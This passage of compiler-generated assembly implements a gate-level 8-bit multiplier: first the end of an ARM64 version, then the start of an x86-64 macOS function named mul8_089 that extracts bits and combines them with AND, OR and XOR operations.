#158] asr w8, w8, #6 and w8, w8, #0x1 strb w8, [sp, #141] ldrb w8, [sp, #158] asr w8, w8, #7 and w8, w8, #0x1 strb w8, [sp, #140] ldrb w8, [sp, #146] ldrb w9, [sp, #149] and w8, w8, w9 strb w8, [sp, #139] ldrb w8, [sp, #148] ldrb w9, [sp, #147] and w8, w8, w9 ldrb w9, [sp, #147] ldrb w10, [sp, #142] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #148] ldrb w10, [sp, #142] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #138] ldrb w8, [sp, #149] ldrb w9, [sp, #149] eon w8, w8, w9 strb w8, [sp, #137] ldrb w8, [sp, #152] ldrb w9, [sp, #141] and w8, w8, w9 mvn w8, w8 strb w8, [sp, #136] ldrb w8, [sp, #146] ldrb w9, [sp, #148] and w8, w8, w9 ldrb w9, [sp, #139] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #135] ldrb w8, [sp, #137] ldrb w9, [sp, #155] and w8, w8, w9 ldrb w9, [sp, #155] ldrb w10, [sp, #154] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #137] ldrb w10, [sp, #154] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #134] ldrb w8, [sp, #149] ldrb w9, [sp, #134] orr w8, w8, w9 ldrb w9, [sp, #140] and w8, w8, w9 mvn w8, w8 strb w8, [sp, #133] ldrb w8, [sp, #149] ldrb w9, [sp, #141] and w8, w8, w9 ldrb w9, [sp, #148] and w8, w8, w9 mvn w8, w8 strb w8, [sp, #132] ldrb w8, [sp, #137] strb w8, [sp, #131] ldrb w8, [sp, #137] strb w8, [sp, #130] ldrb w8, [sp, #130] strb w8, [sp, #129] ldrb w8, [sp, #130] mvn w8, w8 strb w8, [sp, #128] ldrb w8, [sp, #130] mvn w8, w8 strb w8, [sp, #127] ldrb w8, [sp, #152] ldrb w9, [sp, #153] orr w8, w8, w9 ldrb w9, [sp, #148] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #126] ldrb w8, [sp, #140] ldrb w9, [sp, #143] orr w8, w8, w9 strb w8, [sp, #125] ldrb w8, [sp, #125] ldrb w9, [sp, #141] orr w8, w8, w9 ldrb w9, [sp, #138] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #124] ldrb w8, [sp, #124] ldrb w9, [sp, #145] and w8, w8, w9 strb w8, [sp, #123] ldrb w8, [sp, #149] ldrb w9, [sp, #123] and w8, w8, w9 strb w8, [sp, #122] ldrb w8, [sp, #149] ldrb w9, [sp, #123] and w8, w8, w9 strb w8, [sp, #121] ldrb w8, [sp, #133] ldrb w9, [sp, #126] and w8, w8, w9 ldrb w9, [sp, #124] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #120] ldrb w8, [sp, #129] ldrb w9, [sp, #126] and w8, w8, w9 mvn w8, w8 strb w8, [sp, #119] ldrb w8, [sp, #127] mvn w8, w8 strb w8, [sp, #118] ldrb w8, [sp, #119] ldrb w9, [sp, #131] and w8, w8, w9 ldrb w10, [sp, #119] ldrb w9, [sp, #154] bic w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #117] ldrb w8, [sp, #117] ldrb w9, [sp, #141] and w8, w8, w9 strb w8, [sp, #116] ldrb w8, [sp, #132] mvn w8, w8 strb w8, [sp, #115] ldrb w8, [sp, #127] strb w8, [sp, #114] ldrb w8, [sp, #144] ldrb w9, [sp, #145] orr w8, w8, w9 strb w8, [sp, #113] ldrb w8, [sp, #114] ldrb w9, [sp, #136] orr w8, w8, w9 strb w8, [sp, #112] ldrb w8, [sp, #152] ldrb w9, [sp, #151] orr w8, w8, w9 strb w8, [sp, #111] ldrb w8, [sp, #142] ldrb w9, [sp, #111] and w8, w8, w9 strb w8, [sp, #110] ldrb w8, [sp, #150] ldrb w9, [sp, #113] and w8, w8, w9 strb w8, [sp, #109] ldrb w8, [sp, #149] ldrb w9, [sp, #144] and w8, w8, w9 strb w8, [sp, #108] ldrb w8, [sp, #137] strb w8, [sp, #107] ldrb w8, [sp, #133] mvn w8, w8 strb w8, [sp, #106] ldrb w8, [sp, #135] mvn w8, w8 strb w8, [sp, #105] ldrb w8, [sp, #148] ldrb w9, [sp, #144] and w8, w8, w9 strb w8, [sp, #104] ldrb w8, [sp, #112] mvn w8, w8 strb w8, [sp, #103] ldrb w8, [sp, #151] ldrb w9, [sp, #143] and w8, w8, w9 strb w8, [sp, #102] ldrb w8, [sp, #150] ldrb w9, [sp, #143] and w8, w8, w9 strb w8, [sp, #101] ldrb w8, [sp, #149] ldrb w9, [sp, #143] and w8, w8, w9 strb w8, [sp, #100] ldrb w8, [sp, #148] ldrb w9, [sp, #143] and w8, w8, w9 strb w8, [sp, #99] ldrb w8, [sp, #151] ldrb w9, [sp, #113] and w8, w8, w9 strb w8, [sp, #98] ldrb w8, [sp, #150] ldrb w9, [sp, #142] and w8, w8, w9 strb w8, [sp, #97] ldrb w8, [sp, #149] ldrb w9, [sp, #142] and w8, w8, w9 strb w8, [sp, #96] ldrb w8, [sp, #148] ldrb w9, [sp, #142] and w8, w8, w9 strb w8, [sp, #95] ldrb w8, [sp, #151] ldrb w9, [sp, #141] and w8, w8, w9 strb w8, [sp, #94] ldrb w8, [sp, #150] ldrb w9, [sp, #141] and w8, w8, w9 strb w8, [sp, #93] ldrb w8, [sp, #150] ldrb w9, [sp, #141] and w8, w8, w9 strb w8, [sp, #92] ldrb w8, [sp, #149] ldrb w9, [sp, #141] and w8, w8, w9 strb w8, [sp, #91] ldrb w8, [sp, #148] ldrb w9, [sp, #141] and w8, w8, w9 strb w8, [sp, #90] ldrb w8, [sp, #100] strb w8, [sp, #89] ldrb w8, [sp, #153] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #88] ldrb w8, [sp, #152] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #87] ldrb w8, [sp, #151] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #86] ldrb w8, [sp, #151] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #85] ldrb w8, [sp, #150] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #84] ldrb w8, [sp, #149] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #83] ldrb w8, [sp, #148] ldrb w9, [sp, #140] and w8, w8, w9 strb w8, [sp, #82] ldrb w8, [sp, #121] strb w8, [sp, #81] ldrb w8, [sp, #122] strb w8, [sp, #80] ldrb w8, [sp, #107] ldrb w9, [sp, #98] and w8, w8, w9 strb w8, [sp, #79] ldrb w8, [sp, #104] strb w8, [sp, #78] ldrb w8, [sp, #120] strb w8, [sp, #77] ldrb w8, [sp, #120] strb w8, [sp, #76] ldrb w8, [sp, #109] ldrb w9, [sp, #102] orr w8, w8, w9 strb w8, [sp, #75] ldrb w8, [sp, #108] ldrb w9, [sp, #101] eor w8, w8, w9 strb w8, [sp, #74] ldrb w8, [sp, #108] ldrb w9, [sp, #101] and w8, w8, w9 strb w8, [sp, #73] ldrb w8, [sp, #78] ldrb w9, [sp, #89] eor w8, w8, w9 ldrb w9, [sp, #97] eor w8, w8, w9 strb w8, [sp, #72] ldrb w8, [sp, #78] ldrb w9, [sp, #89] and w8, w8, w9 ldrb w9, [sp, #89] ldrb w10, [sp, #97] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #78] ldrb w10, [sp, #97] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #71] ldrb w8, [sp, #99] ldrb w9, [sp, #96] and w8, w8, w9 strb w8, [sp, #70] ldrb w8, [sp, #99] ldrb w9, [sp, #96] eor w8, w8, w9 strb w8, [sp, #69] ldrb w8, [sp, #120] ldrb w9, [sp, #80] orr w8, w8, w9 strb w8, [sp, #68] ldrb w8, [sp, #81] strb w8, [sp, #67] ldrb w8, [sp, #92] ldrb w9, [sp, #79] eor w8, w8, w9 ldrb w9, [sp, #75] eor w8, w8, w9 strb w8, [sp, #66] ldrb w8, [sp, #92] ldrb w9, [sp, #79] and w8, w8, w9 ldrb w9, [sp, #79] ldrb w10, [sp, #75] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #92] ldrb w10, [sp, #75] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #65] ldrb w8, [sp, #88] ldrb w9, [sp, #110] eor w8, w8, w9 ldrb w9, [sp, #74] eor w8, w8, w9 strb w8, [sp, #64] ldrb w8, [sp, #88] ldrb w9, [sp, #110] and w8, w8, w9 ldrb w9, [sp, #110] ldrb w10, [sp, #74] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #88] ldrb w10, [sp, #74] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #63] ldrb w8, [sp, #73] ldrb w9, [sp, #94] eor w8, w8, w9 ldrb w9, [sp, #87] eor w8, w8, w9 strb w8, [sp, #62] ldrb w8, [sp, #73] ldrb w9, [sp, #94] and w8, w8, w9 ldrb w9, [sp, #94] ldrb w10, [sp, #87] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #73] ldrb w10, [sp, #87] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #61] ldrb w8, [sp, #71] ldrb w9, [sp, #93] eor w8, w8, w9 ldrb w9, [sp, #86] eor w8, w8, w9 strb w8, [sp, #60] ldrb w8, [sp, #71] ldrb w9, [sp, #93] and w8, w8, w9 ldrb w9, [sp, #93] ldrb w10, [sp, #86] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #71] ldrb w10, [sp, #86] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #59] ldrb w8, [sp, #70] ldrb w9, [sp, #91] eor w8, w8, w9 ldrb w9, [sp, #84] eor w8, w8, w9 strb w8, [sp, #58] ldrb w8, [sp, #70] ldrb w9, [sp, #91] and w8, w8, w9 ldrb w9, [sp, #91] ldrb w10, [sp, #84] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #70] ldrb w10, [sp, #84] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #57] ldrb w8, [sp, #115] ldrb w9, [sp, #106] and w8, w8, w9 strb w8, [sp, #56] ldrb w8, [sp, #90] ldrb w9, [sp, #83] eor w8, w8, w9 strb w8, [sp, #55] ldrb w8, [sp, #90] ldrb w9, [sp, #83] and w8, w8, w9 strb w8, [sp, #54] ldrb w8, [sp, #66] strb w8, [sp, #53] ldrb w8, [sp, #64] ldrb w9, [sp, #65] eor w8, w8, w9 strb w8, [sp, #52] ldrb w8, [sp, #64] ldrb w9, [sp, #65] and w8, w8, w9 strb w8, [sp, #51] ldrb w8, [sp, #72] ldrb w9, [sp, #70] eor w8, w8, w9 ldrb w9, [sp, #62] eor w8, w8, w9 strb w8, [sp, #50] ldrb w8, [sp, #72] ldrb w9, [sp, #70] and w8, w8, w9 ldrb w9, [sp, #70] ldrb w10, [sp, #62] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #72] ldrb w10, [sp, #62] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #49] ldrb w8, [sp, #69] ldrb w9, [sp, #60] and w8, w8, w9 strb w8, [sp, #48] ldrb w8, [sp, #69] ldrb w9, [sp, #60] orr w8, w8, w9 strb w8, [sp, #47] ldrb w8, [sp, #95] ldrb w9, [sp, #58] and w8, w8, w9 strb w8, [sp, #46] ldrb w8, [sp, #95] ldrb w9, [sp, #58] eor w8, w8, w9 strb w8, [sp, #45] ldrb w8, [sp, #54] strb w8, [sp, #44] ldrb w8, [sp, #85] ldrb w9, [sp, #128] eor w8, w8, w9 ldrb w9, [sp, #67] eor w8, w8, w9 strb w8, [sp, #43] ldrb w8, [sp, #85] strb w8, [sp, #42] ldrb w8, [sp, #68] ldrb w9, [sp, #118] and w8, w8, w9 ldrb w10, [sp, #68] ldrb w9, [sp, #61] bic w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #41] ldrb w8, [sp, #53] ldrb w9, [sp, #105] orr w8, w8, w9 strb w8, [sp, #40] ldrb w8, [sp, #52] ldrb w9, [sp, #103] orr w8, w8, w9 strb w8, [sp, #39] ldrb w8, [sp, #50] ldrb w9, [sp, #51] eor w8, w8, w9 ldrb w9, [sp, #63] eor w8, w8, w9 strb w8, [sp, #38] ldrb w8, [sp, #50] ldrb w9, [sp, #51] and w8, w8, w9 ldrb w9, [sp, #51] ldrb w10, [sp, #63] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #50] ldrb w10, [sp, #63] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #37] ldrb w8, [sp, #47] ldrb w9, [sp, #49] eor w8, w8, w9 ldrb w9, [sp, #61] eor w8, w8, w9 strb w8, [sp, #36] ldrb w8, [sp, #47] ldrb w9, [sp, #49] and w8, w8, w9 ldrb w9, [sp, #49] ldrb w10, [sp, #61] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #47] ldrb w10, [sp, #61] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #35] ldrb w8, [sp, #45] ldrb w9, [sp, #48] eor w8, w8, w9 ldrb w9, [sp, #59] eor w8, w8, w9 strb w8, [sp, #34] ldrb w8, [sp, #45] ldrb w9, [sp, #48] and w8, w8, w9 ldrb w9, [sp, #48] ldrb w10, [sp, #59] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #45] ldrb w10, [sp, #59] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #33] ldrb w8, [sp, #55] ldrb w9, [sp, #46] eor w8, w8, w9 ldrb w9, [sp, #57] eor w8, w8, w9 strb w8, [sp, #32] ldrb w8, [sp, #55] ldrb w9, [sp, #46] and w8, w8, w9 ldrb w9, [sp, #46] ldrb w10, [sp, #57] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #55] ldrb w10, [sp, #57] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #31] ldrb w8, [sp, #137] ldrb w9, [sp, #56] and w8, w8, w9 strb w8, [sp, #30] ldrb w8, [sp, #82] ldrb w9, [sp, #44] eor w8, w8, w9 strb w8, [sp, #29] ldrb w8, [sp, #43] ldrb w9, [sp, #74] orr w8, w8, w9 strb w8, [sp, #28] ldrb w8, [sp, #41] strb w8, [sp, #27] ldrb w8, [sp, #40] ldrb w9, [sp, #116] orr w8, w8, w9 strb w8, [sp, #26] ldrb w8, [sp, #39] strb w8, [sp, #25] ldrb w8, [sp, #39] strb w8, [sp, #24] ldrb w8, [sp, #38] strb w8, [sp, #23] ldrb w8, [sp, #36] ldrb w9, [sp, #37] eor w8, w8, w9 strb w8, [sp, #22] ldrb w8, [sp, #36] ldrb w9, [sp, #37] and w8, w8, w9 strb w8, [sp, #21] ldrb w8, [sp, #34] ldrb w9, [sp, #35] eor w8, w8, w9 ldrb w9, [sp, #21] eor w8, w8, w9 strb w8, [sp, #20] ldrb w8, [sp, #34] ldrb w9, [sp, #35] and w8, w8, w9 ldrb w9, [sp, #35] ldrb w10, [sp, #21] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #34] ldrb w10, [sp, #21] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #19] ldrb w8, [sp, #32] ldrb w9, [sp, #33] eor w8, w8, w9 ldrb w9, [sp, #19] eor w8, w8, w9 strb w8, [sp, #18] ldrb w8, [sp, #32] ldrb w9, [sp, #33] and w8, w8, w9 ldrb w9, [sp, #33] ldrb w10, [sp, #19] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #32] ldrb w10, [sp, #19] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #17] ldrb w8, [sp, #29] ldrb w9, [sp, #31] eor w8, w8, w9 ldrb w9, [sp, #17] eor w8, w8, w9 strb w8, [sp, #16] ldrb w8, [sp, #29] ldrb w9, [sp, #31] and w8, w8, w9 ldrb w9, [sp, #31] ldrb w10, [sp, #17] and w9, w9, w10 orr w8, w8, w9 ldrb w9, [sp, #29] ldrb w10, [sp, #17] and w9, w9, w10 orr w8, w8, w9 strb w8, [sp, #15] ldrb w8, [sp, #30] ldrb w9, [sp, #15] orr w8, w8, w9 strb w8, [sp, #14] ldrb w8, [sp, #24] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9 strh w8, [sp, #156] ldrb w8, [sp, #77] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #1 strh w8, [sp, #156] ldrb w8, [sp, #49] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #2 strh w8, [sp, #156] ldrb w8, [sp, #42] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #3 strh w8, [sp, #156] ldrb w8, [sp, #28] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #4 strh w8, [sp, #156] ldrb w8, [sp, #27] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #5 strh w8, [sp, #156] ldrb w8, [sp, #76] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #6 strh w8, [sp, #156] ldrb w8, [sp, #27] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #7 strh w8, [sp, #156] ldrb w8, [sp, #26] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #8 strh w8, [sp, #156] ldrb w8, [sp, #25] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #9 strh w8, [sp, #156] ldrb w8, [sp, #23] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #10 strh w8, [sp, #156] ldrb w8, [sp, #22] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #11 strh w8, [sp, #156] ldrb w8, [sp, #20] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #12 strh w8, [sp, #156] ldrb w8, [sp, #18] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #13 strh w8, [sp, #156] ldrb w8, [sp, #16] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #14 strh w8, [sp, #156] ldrb w8, [sp, #14] and w9, w8, #0x1 ldrh w8, [sp, #156] orr w8, w8, w9, lsl #15 strh w8, [sp, #156] ldrh w0, [sp, #156] add sp, sp, #160 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _mul8_089 ## -- Begin function mul8_089 .p2align 4, 0x90 _mul8_089: ## @mul8_089 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $18, %rsp movb %sil, %al movb %dil, %cl movb %cl, -1(%rbp) movb %al, -2(%rbp) movw $0, -4(%rbp) movzbl -1(%rbp), %eax sarl $0, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -5(%rbp) movzbl -1(%rbp), %eax sarl $1, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -6(%rbp) movzbl -1(%rbp), %eax sarl $2, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -7(%rbp) movzbl -1(%rbp), %eax sarl $3, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -8(%rbp) movzbl -1(%rbp), %eax sarl $4, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -9(%rbp) movzbl -1(%rbp), %eax sarl $5, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -10(%rbp) movzbl -1(%rbp), %eax sarl $6, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -11(%rbp) movzbl -1(%rbp), %eax sarl $7, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -12(%rbp) movzbl -2(%rbp), %eax sarl $0, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -13(%rbp) movzbl -2(%rbp), %eax sarl $1, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -14(%rbp) movzbl -2(%rbp), %eax sarl $2, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -15(%rbp) movzbl -2(%rbp), %eax sarl $3, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -16(%rbp) movzbl -2(%rbp), %eax sarl $4, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -17(%rbp) movzbl -2(%rbp), %eax sarl $5, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -18(%rbp) movzbl -2(%rbp), %eax sarl $6, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -19(%rbp) movzbl -2(%rbp), %eax sarl $7, %eax andl $1, %eax ## kill: def $al killed $al killed $eax movb %al, -20(%rbp) movzbl -14(%rbp), %eax movzbl -11(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -21(%rbp) movzbl -12(%rbp), %eax movzbl -13(%rbp), %ecx andl %ecx, %eax movzbl -13(%rbp), %ecx movzbl -18(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -12(%rbp), %ecx movzbl -18(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -22(%rbp) movzbl -11(%rbp), %eax movzbl -11(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -23(%rbp) movzbl -8(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -24(%rbp) movzbl -14(%rbp), %eax movzbl -12(%rbp), %ecx andl %ecx, %eax movzbl -21(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -25(%rbp) movzbl -23(%rbp), %eax movzbl -5(%rbp), %ecx andl %ecx, %eax movzbl -5(%rbp), %ecx movzbl -6(%rbp), %edx andl %edx, %ecx orl %ecx, %eax movzbl -23(%rbp), %ecx movzbl -6(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -26(%rbp) movzbl -11(%rbp), %eax movzbl -26(%rbp), %ecx orl %ecx, %eax movzbl -20(%rbp), %ecx andl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -27(%rbp) movzbl -11(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax movzbl -12(%rbp), %ecx andl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -28(%rbp) movb -23(%rbp), %al movb %al, -29(%rbp) movb -23(%rbp), %al movb %al, -30(%rbp) movb -30(%rbp), %al movb %al, -31(%rbp) movzbl -30(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -32(%rbp) movzbl -30(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -33(%rbp) movzbl -8(%rbp), %eax movzbl -7(%rbp), %ecx orl %ecx, %eax movzbl -12(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -34(%rbp) movzbl -20(%rbp), %eax movzbl -17(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -35(%rbp) movzbl -35(%rbp), %eax movzbl -19(%rbp), %ecx orl %ecx, %eax movzbl -22(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -36(%rbp) movzbl -36(%rbp), %eax movzbl -15(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -37(%rbp) movzbl -11(%rbp), %eax movzbl -37(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -38(%rbp) movzbl -11(%rbp), %eax movzbl -37(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -39(%rbp) movzbl -27(%rbp), %eax movzbl -34(%rbp), %ecx andl %ecx, %eax movzbl -36(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -40(%rbp) movzbl -31(%rbp), %eax movzbl -34(%rbp), %ecx andl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -41(%rbp) movzbl -33(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -42(%rbp) movzbl -41(%rbp), %eax movzbl -29(%rbp), %ecx andl %ecx, %eax movzbl -41(%rbp), %ecx xorl $-1, %ecx movzbl -6(%rbp), %edx andl %edx, %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -43(%rbp) movzbl -43(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -44(%rbp) movzbl -28(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -45(%rbp) movb -33(%rbp), %al movb %al, -46(%rbp) movzbl -16(%rbp), %eax movzbl -15(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -47(%rbp) movzbl -46(%rbp), %eax movzbl -24(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -48(%rbp) movzbl -8(%rbp), %eax movzbl -9(%rbp), %ecx orl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -49(%rbp) movzbl -18(%rbp), %eax movzbl -49(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -50(%rbp) movzbl -10(%rbp), %eax movzbl -47(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -51(%rbp) movzbl -11(%rbp), %eax movzbl -16(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -52(%rbp) movb -23(%rbp), %al movb %al, -53(%rbp) movzbl -27(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -54(%rbp) movzbl -25(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -55(%rbp) movzbl -12(%rbp), %eax movzbl -16(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -56(%rbp) movzbl -48(%rbp), %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -57(%rbp) movzbl -9(%rbp), %eax movzbl -17(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -58(%rbp) movzbl -10(%rbp), %eax movzbl -17(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -59(%rbp) movzbl -11(%rbp), %eax movzbl -17(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -60(%rbp) movzbl -12(%rbp), %eax movzbl -17(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -61(%rbp) movzbl -9(%rbp), %eax movzbl -47(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -62(%rbp) movzbl -10(%rbp), %eax movzbl -18(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -63(%rbp) movzbl -11(%rbp), %eax movzbl -18(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -64(%rbp) movzbl -12(%rbp), %eax movzbl -18(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -65(%rbp) movzbl -9(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -66(%rbp) movzbl -10(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -67(%rbp) movzbl -10(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -68(%rbp) movzbl -11(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -69(%rbp) movzbl -12(%rbp), %eax movzbl -19(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -70(%rbp) movb -60(%rbp), %al movb %al, -71(%rbp) movzbl -7(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -72(%rbp) movzbl -8(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -73(%rbp) movzbl -9(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -74(%rbp) movzbl -9(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -75(%rbp) movzbl -10(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -76(%rbp) movzbl -11(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -77(%rbp) movzbl -12(%rbp), %eax movzbl -20(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -78(%rbp) movb -39(%rbp), %al movb %al, -79(%rbp) movb -38(%rbp), %al movb %al, -80(%rbp) movzbl -53(%rbp), %eax movzbl -62(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -81(%rbp) movb -56(%rbp), %al movb %al, -82(%rbp) movb -40(%rbp), %al movb %al, -83(%rbp) movb -40(%rbp), %al movb %al, -84(%rbp) movzbl -51(%rbp), %eax movzbl -58(%rbp), %ecx orl %ecx, %eax ## kill: def $al 